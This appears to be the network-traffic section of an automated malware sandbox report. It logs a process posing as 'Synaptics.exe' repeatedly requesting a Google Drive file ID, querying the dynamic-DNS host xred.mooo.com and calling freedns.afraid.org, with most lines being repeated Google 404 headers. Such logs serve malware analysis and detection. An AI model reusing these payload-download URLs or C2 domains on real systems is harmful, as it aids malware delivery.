                              Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                              Source: global trafficDNS traffic detected: DNS query: docs.google.com
                              Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                              Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:23:37 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-ZBjK20AS9MKuj5nNqCSh8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AHmUCY0ewsfPUJAJfYy5i9ywgFg1OYiYr7jtRJg_COrKbqwA3JdY20BFdNn7iBKglKyNFbWckvhUnvcPRwServer: UploadServerSet-Cookie: NID=519=N9IVbbi_ybLPlL5Ktyomp8O37RR9rhONV7JOpGGGH3MJvuEsW8uL6tAxek_47v5zGYQH0cEaxH2NJH4IYHq-qBw05DF44ia6B50eYng5_PfBZLi1AKtMZPje_9RzC4hJ-lUNz755i8_9aooWMtjFNO3EzyN5FXjyG1fZd5oVw0XASIDEOIZYaVQ; expires=Sat, 17-May-2025 10:23:37 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:23:37 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-nTAq9O8OHHH-Y6TnIKwMvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AHmUCY2fW3bYTSVwIHWWemZ939OGliQeUXi8HENLYOyY9pdIlHwjbNbCYmIrrxznO7L0AOshtfrl8rhCNwServer: UploadServerSet-Cookie: NID=519=SEIp9Ft1pM_DTSp4ZWAE2JXd5p6vYnOenYasNDVud7Yu6_XlLVZWsdgqTMAV0WJp8gbHLzac7m-O074jzZozfmgMpTLCdPEbll-92cpDhan5otbZ5vTSOiiwCIw1pFCy9i0rkRERXyoZZbduoCGvMnLGpGFYBf-d6w_ZXbzQtTOeATiGU0dEJLQO; expires=Sat, 17-May-2025 10:23:37 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:23:38 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-KID8Bmmfkos1AQa7FbFDIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC6aod1xvXH4RJbmt60hFaE47qEFTrppxOCXzSxyUAb1LHVbPTK9iq5HL-vp3kAuyfuN130Server: UploadServerSet-Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14; expires=Sat, 17-May-2025 10:23:38 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:23:39 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-MbFjJOfr2lxQDAYD5AA7Gg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC6xvvkf5JEWNm-Ebn0hiW1kBU41BGLEaRKdWiflC-APIEpLNolaXMv8I9Q3pLhL7kzFVwD7hwXKNQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:23:41 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-x9y0utDfJiKu31ywvBbS_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC7L2BXvs262vS2RCRr1XhfzU8weUU737nJjB4ff9xin1Iu_yxpEYqP6CE2CWgkgSeSDMB0Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:23:41 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-AT4tiocDJ7GXbZrMx4bX9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC6sXoB-DQ3X68mRqwrwTwB86msQX0Am439MkhnBXj8L7rA-JKo93560cs_SqJvE05cXjtAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:23:42 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-p9BG4DZgJUz7Mnn4sIUu3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC6Rgn-k5P4zZCNn2251JsyUHVJBxLxNg32qsrLpRLMZ3MFcKVYs1myuJd1wWFJk-b35NNbr5-dl2QServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:23:42 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-N6-oDqMd85dbC50aH0YZvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AHmUCY0iGK6LLCieb78sH308NIyZvL5BY9KayvBeI27tWt0pjOdD06VMPQifpkf8SQd8P8RH7XEServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:23:45 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EV9ShNppUNIrt-oCFPKVVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AHmUCY2MZ9waaS5O8PdRUeWLOXiZri5zFmP996unH6bn9nBn9F5wmdRAH7fgiPbPpIan2tb73dwServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:23:45 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4AEcD5BCGIruSbU78IRBOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC5ieBayJDvdRDAPXr03Cf5LmNkqrMiW2zX8_Rd8VBVUHn1XAuCp-EBV_g81Imd-ywT9dQjtwr6dSQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
